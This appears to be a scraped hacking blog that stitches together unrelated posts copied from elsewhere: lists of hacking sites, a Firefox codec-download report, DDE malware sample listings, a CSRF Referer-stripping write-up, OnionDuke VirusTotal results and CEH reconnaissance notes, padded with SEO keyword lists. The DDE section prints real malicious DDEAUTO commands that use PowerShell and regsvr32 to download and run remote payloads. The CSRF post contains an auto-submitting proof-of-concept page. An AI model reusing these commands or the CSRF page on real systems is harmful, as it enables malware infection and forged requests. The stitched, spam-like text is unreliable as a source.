Tuesday, June 30, 2020

Top 10 Best Websites To Learn Hacking

  1. SecTools.Org: List of 75 security tools based on a 2003 vote by hackers.
  2. Hacked Gadgets: A resource for DIY project documentation as well as general gadget and technology news.
  3. Exploit DB: An archive of exploits and vulnerable software by Offensive Security. The site collects exploits from submissions and mailing lists and concentrates them in a single database.
  4. KitPloit: Leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security.
  5. HackRead: HackRead is a News Platform that centers on InfoSec, Cyber Crime, Privacy, Surveillance, and Hacking News with full-scale reviews on Social Media Platforms.
  6. Phrack Magazine: Digital hacking magazine.
  7. Hakin9: E-magazine offering in-depth looks at both attack and defense techniques and concentrates on difficult technical issues.
  8. Metasploit: Find security issues, verify vulnerability mitigations & manage security assessments with Metasploit. Get the worlds best penetration testing software now.
  9. The Hacker News: The Hacker News — most trusted and widely-acknowledged online cyber security news magazine with in-depth technical coverage for cybersecurity.
  10. Packet Storm: Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers.

Thursday, June 11, 2020

Security Surprises On Firefox Quantum

This morning I've found an scaring surprise on my Firefox Quantum. Casually it was connected to a proxy when an unexpected connection came up, the browser  was connecting to an unknown remote site via HTTP and downloading a ZIP that contains an ELF shared library, without any type of signature on it.

This means two things

1) the owner of that site might spread malware infecting many many people.
2) the ISP also might do that.


Ubuntu Version:


Firefox Quantum version:



The URL: hxxp://ciscobinary.openh264.org/openh264-linux64-0410d336bb748149a4f560eb6108090f078254b1.zip




The zip contains these two files:
  3f201a8984d6d765bc81966842294611  libgmpopenh264.so
  44aef3cd6b755fa5f6968725b67fd3b8  gmpopenh264.info

The info file:
  Name: gmpopenh264
  Description: GMP Plugin for OpenH264.
  Version: 1.6.0
  APIs: encode-video[h264], decode-video[h264]

So there is a remote codec loading system that is unsigned and unencrypted, I think is good to be aware of it.

In this case the shared library is a video decoder, but it would be a vector to distribute malware o spyware massively, or an attack vector for a MITM attacker.




More information


  1. What Hacking Is
  2. Hacker Box
  3. Pentestmonkey
  4. Pentest With Metasploit
  5. Pentest Partners
  6. Pentest Vpn
  7. Pentest Keys
  8. Pentestmonkey Cheat Sheet
  9. Hacker On Computer
  10. Hacker Ethic
  11. Pentest Windows 7

Magecart Targets Emergency Services-related Sites Via Insecure S3 Buckets

Hacking groups are continuing to leverage misconfigured AWS S3 data storage buckets to insert malicious code into websites in an attempt to swipe credit card information and carry out malvertising campaigns. In a new report shared with The Hacker News, cybersecurity firm RiskIQ said it identified three compromised websites belonging to Endeavor Business Media last month that are still hosting

via The Hacker NewsRead more

DDE Command Execution Malware Samples






Here are a few samples related to the recent DDE Command execution






Reading:
10/18/2017 InQuest/yara-rules 
10/18/2017 https://twitter.com/i/moments/918126999738175489 


Download


File information
List of available files:
Word documents:
bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb
a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428
b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568
9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862
7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280
313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065
9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d
8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184
11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13
bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9

Payload 
8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf
2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c
316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea
5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f
fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669 


File details with MD5 hashes:
Word documents:
1. bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb EDGAR_Rules.docx
bcadcf65bcf8940fff6fc776dd56563 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://pastebin.com/raw/pxSE2TJ1')) ")

2. 1a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428 EDGAR_Rules_2017.docx
 2c0cfdc5b5653cb3e8b0f8eeef55fc32 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://trt.doe.louisiana.gov/fonts.txt')) ")

3 4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 SBNG20171010.docx
8be9633d5023699746936a2b073d2d67 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://104.131.178.222/s.ps1');powershell -Command $e. 

4. 9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862 Plantilla - InformesFINAL.docx
78f07a1860ae99c093cc80d31b8bef14 ( DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe $e=new-object -com internetexplorer.application; $e.visible=$true; $e.navigate2(' https://i.ytimg.com/vi/ErLLFVf-0Mw/maxresdefault.jpg '); powershell -e $e " 

5. 7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280 
 aee33500f28791f91c278abb3fcdd942 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://www.filefactory.com/file/2vxfgfitjqrf/Citibk_MT103_Ref71943.exe');powershell -e_

6. 313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065 Giveaway.docx
507784c0796ffebaef7c6fc53f321cd6 (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\cmd.exe" "/c regsvr32 /u /n /s /i:\"h\"t\"t\"p://downloads.sixflags-frightfest.com/ticket-ids scrobj.dll" "For Security Reasons")


7. 9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d  Filings_and_Forms.docx
47111e9854db533c328ddbe6e962602a (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden -C $e=(new-object system.net.webclient).downloadstring('http://goo.gl/Gqdihn');powershell.exe -e $e # " "Filings_and_Forms.docx")

8. 8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184 ~WRD0000.tmp
47111e9854db533c328ddbe6e962602a


9. 11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13 ~WRD0003.tmp
d78ae3b9650328524c3150bef2224460


10. bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9 DanePrzesylki17016.doc
5786dbcbe1959b2978e979bf1c5cb450


Payload Powershell

1. 8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf fonts.txt

2 2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c - powershell script from hxxp://citycarpark.my/components/com_admintools/mscorier

Payload PE

1. 316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea Citibk_MT103_Ref71943.exe
3a4d0c6957d8727c0612c37f27480f1e

2. 5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f FreddieMacPayload
 4f3a6e16950b92bf9bd4efe8bbff9a1e

3. fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669 s50.exe  Poland payload
09d71f068d2bbca9fac090bde74e762b








Message information


For the EDGAR campaign
bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb

 Received: from usa2.serverhoshbilling.com (usa2.serverhoshbilling.com [209.90.232.236])
by m0049925.ppops.net with ESMTP id 2dhb488ej6-1
(version=TLSv1.2 cipher=ECDHE-RSA-AES256-GCM-SHA384 bits=256 verify=NOT)
for <snip>; Wed, 11 Oct 2017 00:09:20 -0400
Received: from salesapo by usa2.serverhoshbilling.com with local (Exim 4.89)
(envelope-from <EDGAR@sec.gov>)
id 1e28HE-0001S5-Ew
for <snip>; Wed, 11 Oct 2017 00:05:48 -0400
To: <snip>
Subject: EDGAR Filings
X-PHP-Script: roofingexperts.org/wp-content/themes/sp/examples/send_edgar_corps.php for 89.106.109.106, 162.158.90.75
X-PHP-Originating-Script: 658:class.phpmailer.php
Date: Wed, 11 Oct 2017 04:05:48 +0000
From: EDGAR <EDGAR@sec.gov>
Reply-To: EDGAR <EDGAR@sec.gov>
Message-ID: <7608a3de5fe6c9bf7df6782a8aa9790f@roofingexperts.org>
X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="b1_7608a3de5fe6c9bf7df6782a8aa9790f"
Content-Transfer-Encoding: 8bit
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - usa2.serverhoshbilling.com
X-AntiAbuse: Original Domain - nu.com
X-AntiAbuse: Originator/Caller UID/GID - [658 497] / [47 12]
X-AntiAbuse: Sender Address Domain - sec.gov
X-Get-Message-Sender-Via: usa2.serverhoshbilling.com: authenticated_id: salesapo/only user confirmed/virtual account not confirmed
X-Authenticated-Sender: usa2.serverhoshbilling.com: salesapo
X-Source: /opt/cpanel/ea-php56/root/usr/bin/lsphp
X-Source-Args: lsphp:ntent/themes/sp/examples/send_edgar_corps.php
X-Source-Dir: salesapogee.com:/roofingexperts/wp-content/themes/sp/examples
X-CLX-Shades: Junk
X-CLX-Response: <snip>
X-Proofpoint-Virus-Version: vendor=fsecure engine=2.50.10432:,, definitions=2017-10-10_08:,,
 signatures=0
X-Proofpoint-Spam-Details: rule=spam policy=default score=99 priorityscore=1501 malwarescore=0
 suspectscore=0 phishscore=0 bulkscore=0 spamscore=0 clxscore=-262
 lowpriorityscore=0 impostorscore=0 adultscore=0 classifier=clx:Junk
 adjust=0 reason=mlx scancount=1 engine=8.0.1-1707230000
 definitions=main-1710110060

This is a multi-part message in MIME format.

--b1_7608a3de5fe6c9bf7df6782a8aa9790f
Content-Type: multipart/alternative;
boundary="b2_7608a3de5fe6c9bf7df6782a8aa9790f"

--b2_7608a3de5fe6c9bf7df6782a8aa9790f
Content-Type: text/plain; charset=us-ascii

Important information about last changes in EDGAR Filings


--b2_7608a3de5fe6c9bf7df6782a8aa9790f
Content-Type: text/html; charset=us-ascii

<b>Important information about last changes in EDGAR Filings</b><br/><br/>Attached document is directed to <snip>



--b2_7608a3de5fe6c9bf7df6782a8aa9790f--

--b1_7608a3de5fe6c9bf7df6782a8aa9790f
Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document; name="EDGAR_Rules_2017.docx"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=EDGAR_Rules_2017.docx

<snip>


--b1_7608a3de5fe6c9bf7df6782a8aa9790f--


for 4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 SBNG20171010.docx

Received: from VI1PR08MB2670.eurprd08.prod.outlook.com (10.175.245.20) by
 AM4PR08MB2659.eurprd08.prod.outlook.com (10.171.190.148) with Microsoft SMTP
 Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id
 15.20.77.7 via Mailbox Transport; Thu, 12 Oct 2017 10:45:16 +0000
Received: from DB6PR0802MB2600.eurprd08.prod.outlook.com (10.172.252.17) by
 VI1PR08MB2670.eurprd08.prod.outlook.com (10.175.245.20) with Microsoft SMTP
 Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id
 15.20.77.7; Thu, 12 Oct 2017 10:45:15 +0000
Received: from VI1PR0802CA0047.eurprd08.prod.outlook.com
 (2603:10a6:800:a9::33) by DB6PR0802MB2600.eurprd08.prod.outlook.com
 (2603:10a6:4:a2::17) with Microsoft SMTP Server (version=TLS1_2,
 cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id 15.20.77.7; Thu, 12 Oct
 2017 10:45:14 +0000
Received: from DB3FFO11FD006.protection.gbl (2a01:111:f400:7e04::133) by
 VI1PR0802CA0047.outlook.office365.com (2603:10a6:800:a9::33) with Microsoft
 SMTP Server (version=TLS1_2,
 cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id 15.20.77.7 via Frontend
 Transport; Thu, 12 Oct 2017 10:45:14 +0000
Received: from za-hybrid.mail.standardbank.com (147.152.120.47) by
 DB3FFO11FD006.mail.protection.outlook.com (10.47.216.95) with Microsoft SMTP
 Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P384) id
 15.20.77.10 via Frontend Transport; Thu, 12 Oct 2017 10:45:12 +0000
Received: from <snip> (10.234.178.186) by
 <snip>(10.144.20.58) with Microsoft SMTP
 Server (TLS) id 14.3.339.0; Thu, 12 Oct 2017 12:44:35 +0200
Received: from <snip> (10.234.174.102) by
 <snip> with Microsoft SMTP Server
 id 8.3.389.2; Thu, 12 Oct 2017 11:43:42 +0100
Received: from cluster-a.mailcontrol.com (unknown [85.115.52.190]) by
 Forcepoint Email with ESMTPS id AC3EDEB6D852BD348649; Thu, 12 Oct 2017
 11:43:38 +0100 (CET)
Received: from rly14a.srv.mailcontrol.com (localhost [127.0.0.1]) by
 rly14a.srv.mailcontrol.com (MailControl) with ESMTP id v9CAhaCs039950; Thu,
 12 Oct 2017 11:43:36 +0100
Received: from localhost.localdomain (localhost.localdomain [127.0.0.1]) by
 rly14a.srv.mailcontrol.com (MailControl) id v9CAhaRp039947; Thu, 12 Oct 2017
 11:43:36 +0100
Received: from mx1.ssl-secure-mail.com (mx1.ssl-secure-mail.com
 [188.166.157.242]) by rly14a-eth0.srv.mailcontrol.com (envelope-sender
 <Emmanuel.Chatta@stadnardbank.co.za>) (MIMEDefang) with ESMTP id
 v9CAhZoc039719 (TLS bits=256 verify=NO); Thu, 12 Oct 2017 11:43:36 +0100
 (BST)
Received: from authenticated-user (mx1.ssl-secure-mail.com [188.166.157.242])
(using TLSv1 with cipher ECDHE-RSA-AES256-SHA (256/256 bits)) (No client
 certificate requested) by mx1.ssl-secure-mail.com (Postfix) with ESMTPSA id
 571CD1511D4; Thu, 12 Oct 2017 06:43:35 -0400 (EDT)
From: Emmanuel Chatta <Emmanuel.Chatta@stadnardbank.co.za>
To: <snip>
Subject: Document
Thread-Topic: Document
Thread-Index: AQHTQ0cx2UbfjWEaCEK0bdQsLAkUYA==
Date: Thu, 12 Oct 2017 10:43:35 +0000
Message-ID: <f8c34a32397e02274fd65930045f0204@ssl-secure-mail.com>
Content-Language: en-US
X-MS-Exchange-Organization-AuthSource: <snip>
X-MS-Has-Attach: yes
X-MS-TNEF-Correlator:
received-spf: Fail (protection.outlook.com: domain of <snip> does
 not designate 147.152.120.47 as permitted sender)
 receiver=protection.outlook.com; client-ip=147.152.120.47;
 helo=<snip>;
x-scanned-by: MailControl 44278.1987 (www.mailcontrol.com) on 10.65.1.124
x-mailcontrol-inbound: 4HEeExWtV!H1jiRXZJTT7wjEcFneOidAa+WVdv9sScH43ayzJcnLn4fvVkSq3YGx
x-ms-publictraffictype: Email
X-Microsoft-Exchange-Diagnostics: 1;AM4PR08MB2659;27:42C8MVC/6E4KnuK79xnDQihs/aWUnFSYSvMpUq/ZWFgliSK+uNXwEUaalqg0K4Ukdn7mPjI/6bOflK6H4WqZhQpH28iVAkhECXI6saRJPgqIf8Vn6JKx/rSyKhnUCz+c
Content-Type: multipart/mixed;
boundary="_002_f8c34a32397e02274fd65930045f0204sslsecuremailcom_"
MIME-Version: 1.0

More information


Wednesday, June 10, 2020

CSRF Referer Header Strip

Intro

Most of the web applications I see are kinda binary when it comes to CSRF protection; either they have one implemented using CSRF tokens (and more-or-less covering the different functions of the web application) or there is no protection at all. Usually, it is the latter case. However, from time to time I see application checking the Referer HTTP header.

A couple months ago I had to deal with an application that was checking the Referer as a CSRF prevention mechanism, but when this header was stripped from the request, the CSRF PoC worked. BTW it is common practice to accept empty Referer, mainly to avoid breaking functionality.

The OWASP Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet tells us that this defense approach is a baaad omen, but finding a universal and simple solution on the Internetz to strip the Referer header took somewhat more time than I expected, so I decided that the stuff that I found might be useful for others too.

Solutions for Referer header strip

Most of the techniques I have found were way too complicated for my taste. For example, when I start reading a blog post from Egor Homakov to find a solution to a problem, I know that I am going to:
  1. learn something very cool;
  2. have a serious headache from all the new info at the end.
This blog post from him is a bit lighter and covers some useful theoretical background, so make sure you read that first before you continue reading this post. He shows a few nice tricks to strip the Referer, but I was wondering; maybe there is an easier way?

Rich Lundeen (aka WebstersProdigy) made an excellent blog post on stripping the Referer header (again, make sure you read that one first before you continue). The HTTPS to HTTP trick is probably the most well-known one, general and easy enough, but it quickly fails the moment you have an application that only runs over HTTPS (this was my case).

The data method is not browser independent but the about:blank trick works well for some simple requests. Unfortunately, in my case the request I had to attack with CSRF was too complex and I wanted to use XMLHttpRequest. He mentions that in theory, there is anonymous flag for CORS, but he could not get it work. I also tried it, but... it did not work for me either.

Krzysztof Kotowicz also wrote a blog post on Referer strip, coming to similar conclusions as Rich Lundeen, mostly using the data method.

Finally, I bumped into Johannes Ullrich's ISC diary on Referer header and that led to me W3C's Referrer Policy. So just to make a dumb little PoC and show that relying on Referer is a not a good idea, you can simply use the "referrer" meta tag (yes, that is two "r"-s there).

The PoC would look something like this:
<html>
<meta name="referrer" content="never">
<body>
<form action="https://vistimsite.com/function" method="POST">
<input type="hidden" name="param1" value="1" />
<input type="hidden" name="param2" value="2" />
...
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

Conclusion

As you can see, there is quite a lot of ways to strip the Referer HTTP header from the request, so it really should not be considered a good defense against CSRF. My preferred way to make is PoC is with the meta tag, but hey, if you got any better solution for this, use the comment field down there and let me know! :)

Related news

WHY WE DO HACKING?

Purpose of Hacking?
. Just for fun
.Show-off
.Steal important information 
.Damaging the system
.Hampering Privacy
.Money Extortion 
.System Security Testing
.To break policy compliance etc

Related news
  1. Pentest Online Course
  2. Pentestmonkey Cheat Sheet
  3. Hacking Wifi
  4. Hacker Anonymous
  5. Pentesterlab
  6. Pentest Web Application
  7. What Hacking Is
  8. Pentestbox
  9. Hacker Tools
  10. Pentestmonkey
  11. Pentest Plus
  12. Pentest Linux
  13. Pentest Environment
  14. Pentest Owasp Top 10
  15. Hacker Computer
  16. Pentest Tools Framework
  17. Hacking Browser
  18. Hacking Forums

TYPES OF HACKING

Types of hacking?
We can segregate hacking into different categories, based on what being hacked. Here is a set of examples-

1-Website Hacking- Hacking a website means taking unauthorized control over a web server and its associated software such as databases and other interfaces.

2-Network Hacking-Hacking a network means gathering information about a network by using tool like Telnet, Nslookup, Ping, Tracert, Netstat etc with the intent to harm the network system and hamper its operation.

3-Email Hacking-It includes getting unauthorized access on an Email account and using it without taking the permission of the owner.

4-Ethical Hacking-It involves finding weakness in a computer or network system for testing purpose and finally getting them fixed.

5-Password Hacking-This is the process of recovering secret password from data that has been stored in or transmitted by a computer system.

6-Computer Hacking-This is the process of stealing computer ID & Passwords by applying hacking methods and getting unauthorized access to a computer system.
More info

  1. Hackerrank Sql
  2. Pentest Devices
  3. Hacker Keyboard
  4. Hacking Images
  5. Pentest Companies
  6. Pentest Tools For Windows
  7. Hacking Network
  8. Hacking Online Games
  9. Hacking For Dummies
  10. Pentest Standard
  11. Hacker Kevin Mitnick
  12. Hacker Types
  13. Pentest Environment
  14. Basic Pentest 1 Walkthrough

OnionDuke Samples










File attributes

Size: 219136
MD5:  28F96A57FA5FF663926E9BAD51A1D0CB

Size: 126464
MD5:  C8EB6040FD02D77660D19057A38FF769


Size: 316928
MD5:  D1CE79089578DA2D41F1AD901F7B1014


Virustotal info

https://www.virustotal.com/en/file/366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b/analysis/
SHA256: 366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b
File name: 366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b
Detection ratio: 8 / 52
Analysis date: 2014-11-15 18:37:30 UTC ( 8 hours, 44 minutes ago ) 
Antivirus Result Update
Baidu-International Trojan.Win32.Agent.adYf 20141107
F-Secure Backdoor:W32/OnionDuke.B 20141115
Ikarus Trojan.Win32.Agent 20141115
Kaspersky Backdoor.Win32.MiniDuke.x 20141115
Norman OnionDuke.A 20141115
Sophos Troj/Ransom-ALA 20141115
Symantec Backdoor.Miniduke!gen4 20141115
Tencent Win32.Trojan.Agent.Tbsl 20141115

https://www.virustotal.com/en/file/366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b/analysis/


SHA256: 366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b
File name: 366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b
Detection ratio: 8 / 52
Antivirus Result Update
Baidu-International Trojan.Win32.Agent.adYf 20141107
F-Secure Backdoor:W32/OnionDuke.B 20141115
Ikarus Trojan.Win32.Agent 20141115
Kaspersky Backdoor.Win32.MiniDuke.x 20141115
Norman OnionDuke.A 20141115
Sophos Troj/Ransom-ALA 20141115
Symantec Backdoor.Miniduke!gen4 20141115
Tencent Win32.Trojan.Agent.Tbsl 20141115

https://www.virustotal.com/en/file/0102777ec0357655c4313419be3a15c4ca17c4f9cb4a440bfb16195239905ade/analysis/
SHA256: 0102777ec0357655c4313419be3a15c4ca17c4f9cb4a440bfb16195239905ade
File name: 0102777ec0357655c4313419be3a15c4ca17c4f9cb4a440bfb16195239905ade
Detection ratio: 19 / 55
Analysis date: 2014-11-15 18:37:25 UTC ( 8 hours, 47 minutes ago ) 
Antivirus Result Update
AVware Trojan.Win32.Generic!BT 20141115
Ad-Aware Backdoor.Generic.933739 20141115
Baidu-International Trojan.Win32.OnionDuke.BA 20141107
BitDefender Backdoor.Generic.933739 20141115
ESET-NOD32 a variant of Win32/OnionDuke.A 20141115
Emsisoft Backdoor.Generic.933739 (B) 20141115
F-Secure Backdoor:W32/OnionDuke.A 20141115
GData Backdoor.Generic.933739 20141115
Ikarus Trojan.Win32.Onionduke 20141115
Kaspersky Backdoor.Win32.MiniDuke.x 20141115
McAfee RDN/Generic BackDoor!zw 20141115
McAfee-GW-Edition BehavesLike.Win32.Trojan.fh 20141114
MicroWorld-eScan Backdoor.Generic.933739 20141115
Norman OnionDuke.B 20141115
Sophos Troj/Ransom-ANU 20141115
Symantec Backdoor.Miniduke!gen4 20141115
TrendMicro BKDR_ONIONDUKE.AD 20141115
TrendMicro-HouseCall BKDR_ONIONDUKE.AD 20141115
VIPRE Trojan.Win32.Generic!BT 20141115


Related word


  1. Hacking Simulator
  2. What Hacking Is
  3. Is Hacking Illegal
  4. Pentest Xss
  5. Pentest Online Course
  6. Hacking Wifi
  7. Pentest With Kali Linux
  8. Pentest Plus
  9. Pentest Partners
  10. Pentest Security
  11. Hacking Gif
  12. Pentest Tutorial
  13. Pentest Questions
  14. Pentest Iso
  15. Hacking Groups
  16. Pentest With Metasploit
  17. Pentest Blog

CEH Practical: Gathering Target Information: Reconnaissance And Competitive Intelligence

CEH Exam Objectives:

Describe Reconnaissance. 

Describe aggressive/competitive intelligence.


Reconnaissance

 Reconnaissance is the process of gathering informative data about a particular target of a malicious hack by exploring the targeted system. Basically two types of Reconnaissance exist i.e. Active and Passive. Active reconnaissance typically related to port scanning and observing the vulnerabilities about the targeted system (i.e., which ports are left vulnerable and/or if there are ways around the firewall and routers). Passive reconnaissance typically you will not be directly connected to a computer system. This process is used to gather essential information without ever interacting with the target systems.

Understand Aggressive Intelligence 

Competitive intelligence means information gathering about competitors' products, marketing, and technologies. Most competitive intelligence is non intrusive to the company being investigated and is benign in nature. It's used for product comparison or as a sales and marketing tactic to better understand how competitors are positioning their products or services.

Online tools to gather competitive intelligence

Exercise 1.1

Using KeywordSpy 

To use the KeywordSpy online tool to gather competitive intelligence information:  
  • Go to the www.keywordspy.com website and enter the website address of the target in the search field 

  • Review the report and determine valuable keywords, links, or other information.

 

Exercise 1.2

Using spyfu

  • Go to your browser and type www.spyfu.com and enter the website address of the target in the search field.

Exercise 1.3

Using the EDGAR Database to Gather Information

1. Determine the company's stock symbol using Google.

2. Open a web browser to www.sec.gov.


3. On the right side of the page, click the link EDGAR Filers. 


4. Click the Search For Filings menu and enter the company name or stock  symbol to search the filings for information. You can learn, for example, where the company is registered and who reported the filing.

5. Use the Yahoo! yellow pages ( http://yp.yahoo.com ) to see if an address or phone number is listed for any of the employee names you have located.

Continue reading


  1. Hacker Attack
  2. Hacker Prank
  3. How To Pentest A Website With Kali
  4. Pentest Windows 7
  5. Pentest Windows
  6. Pentest Tools For Windows
  7. Hacking Link
  8. Pentesterlab
  9. Pentest Cyber Security
  10. Pentest Certification
  11. Pentest Report Generator
  12. Pentest Cheat Sheet
  13. Pentest Stages
  14. Basic Pentest 1 Walkthrough
  15. Pentest Practice
  16. Pentest Hardware
  17. Pentesterlab
  18. How To Pentest A Network